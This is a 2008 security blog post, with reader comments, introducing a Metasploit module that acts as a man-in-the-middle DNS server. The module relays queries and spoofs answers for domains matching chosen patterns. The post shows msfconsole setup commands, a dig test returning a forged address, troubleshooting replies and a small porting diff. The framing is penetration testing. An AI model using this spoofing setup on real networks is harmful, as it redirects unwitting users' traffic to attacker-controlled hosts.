Man-in-the-middle Fake DNS for Metasploit
On Episode 116 of PaulDotCom Security Weekly, Paul mentioned how it would be nice if one could have a little bit finer control over the behavior of Metasploit’s fake DNS server. It seemed like an easy enough hack, so I’ve thrown this together. I can see this being useful in some situations, and hopefully you will too.
Metasploit’s fakedns.rb is good at what it does, which is respond to any DNS query with a spoofed response pointing at a specific IP address. This module, which I’ve decided to name “mitm_fakedns.rb”, is a dirty, filthy hack of fakedns.rb. It’s not nearly as polished and thought-out as the web_search_scan.rb module I wrote and posted about a couple of days ago, but it is kinda neat anyway.
It’ll listen for DNS, and when it gets a request, it will go ahead and pass it on to a real DNS server that you can specify. Once it gets the response from the real DNS server, it’ll modify that response to point to the IP addresses you specify if it matches one of a set of regexes you provide. This allows you to be a little more “surgical” with whatever attack you have planned, by only spoofing domain names of-interest.
Let’s have a look at the “show info”:
HacBook:framework wesley$ sudo ./msfconsole
Password:
_
| | o
_ _ _ _ _|_ __, , _ | | __ _|_
/ |/ |/ | |/ | / | / \_|/ \_|/ / \_| |
| | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
/|
\|
=[ msf v3.2-release
+ -- --=[ 299 exploits - 124 payloads
+ -- --=[ 18 encoders - 6 nops
=[ 68 aux
msf > use auxiliary/server/mitm_fakedns
msf auxiliary(mitm_fakedns) > info
Name: MITM DNS Service
Version: 5540
Provided by:
unknown <ddz>
hdm <hdm@metasploit.com>
Wesley McGrew <wesley@mcgrewsecurity.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME yes File of ip,regex for filtering responses
REALDNS yes Ask this server for answers
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 53 yes The local port to listen on.
Description:
This hack of the metasploit fakedns.rb serves as a sort of MITM DNS
server. Requests are passed through to a real DNS server, and the
responses are modified before being returned to the client, if they
match regular expressions set in FILENAME.
Once it's loaded, we can set our variables:
msf auxiliary(mitm_fakedns) > cat /Users/wesley/hosts.txt [*] exec: cat /Users/wesley/hosts.txt 192.168.1.1,google.com 10.0.0.1,example.com msf auxiliary(mitm_fakedns) > set FILENAME /Users/wesley/hosts.txt FILENAME => /Users/wesley/hosts.txt msf auxiliary(mitm_fakedns) > set REALDNS 192.168.1.254 REALDNS => 192.168.1.254 msf auxiliary(mitm_fakedns) > run [*] Auxiliary module running as background job msf auxiliary(mitm_fakedns) >
The file you specify should have an IP address and a regular expression, one pair per line. Once it’s running, you can test it out by pointing “dig” at it:
HacBook:~ wesley$ dig @127.0.0.1 example.com ; <<>> DiG 9.4.1-P1 <<>> @127.0.0.1 example.com ; (1 server found) ;; global options: printcmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 38312 ;; flags: qr ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0 ;; QUESTION SECTION: ;example.com. IN A ;; ANSWER SECTION: example.com. 99270 IN A 10.0.0.1 ;; Query time: 39 msec ;; SERVER: 127.0.0.1#53(127.0.0.1) ;; WHEN: Mon Aug 4 22:59:01 2008 ;; MSG SIZE rcvd: 45
This should serve as a pretty good drop-in replacement for fakedns.rb for some attacks. Here’s the source:
Thanks a lot man, i really like to use Karma/sploit when performing wireless pentesting and have always been fustrated by the fakedns part, unfortunately my ruby knowledge is so misarable i never been able to rewrite something really stable, so i HIGHLY appreciate your version.
Thanks again,
hello,
Just a small question about your scipt, while testing it with your above syntax, i have an ruby error: Auxiliary module filed; can’t convert nil into String
Does it seems familiar to you (or any idea how to solve this), i’m using ubuntu hardy with ruby 1.8.6 ptch level 111
Thanks a lot in advance
Ulrick:
Check your filter text file for trailing newlines.
-eg
Thanks egus! I was wracking my brain over that one.
Thanks guys,
It works now, never thought to look in the hosts file as i did a copy paste of yours.
Worse, when trying on msf for a windows platform, it was working fine, and i was therefore scratching my head on the source code and my linux installation.
Everything is working fine nice and will be able to make better demonstrations during the next penetration tests.
;-)
Hey,
Issue resolved.
Excuse for passing all the info.
http://www.astalavista.com/index.php?section=blog&cmd=details&id=3689
Thanks USB.
Just a note, the mitm_fakedns plugin no longer works with recent versions of the Metasploit 3 testing branch, (trunk).
A major rewrite of the underlying ruby code is underway which seems to break some things. (like class declarations).
Here is my patch of mitm_fakedns to allow it to run within the new framework. (tested with Rev 5845).
—————————————————-
— mitm_fakedns.rb.ORIG 2008-11-05 11:07:12.000000000 -0600
+++ mitm_fakedns.rb 2008-11-05 17:36:44.000000000 -0600
@@ -13,9 +13,9 @@
require ‘msf/core’
require ‘resolv’
-module Msf
-class Auxiliary::Server::MITM_FakeDNS < Msf::Auxiliary
+
+class Metasploit3 < Msf::Auxiliary
include Auxiliary::Report
@@ -165,4 +165,4 @@
end
end
-end
————————————————–
Regards,
-egus
Thanks for taking the time to fix it and post egus! I’ll make the change and upload it once I get a chance :)
does anyone have an idea what is the problem here?
/root/framework-3.2/modules/auxiliary/server/mitm_fakedns.rb: SyntaxError (eval):166:in `load_module_from_file’: compile error
(eval):166: syntax error, unexpected kEND, expecting $end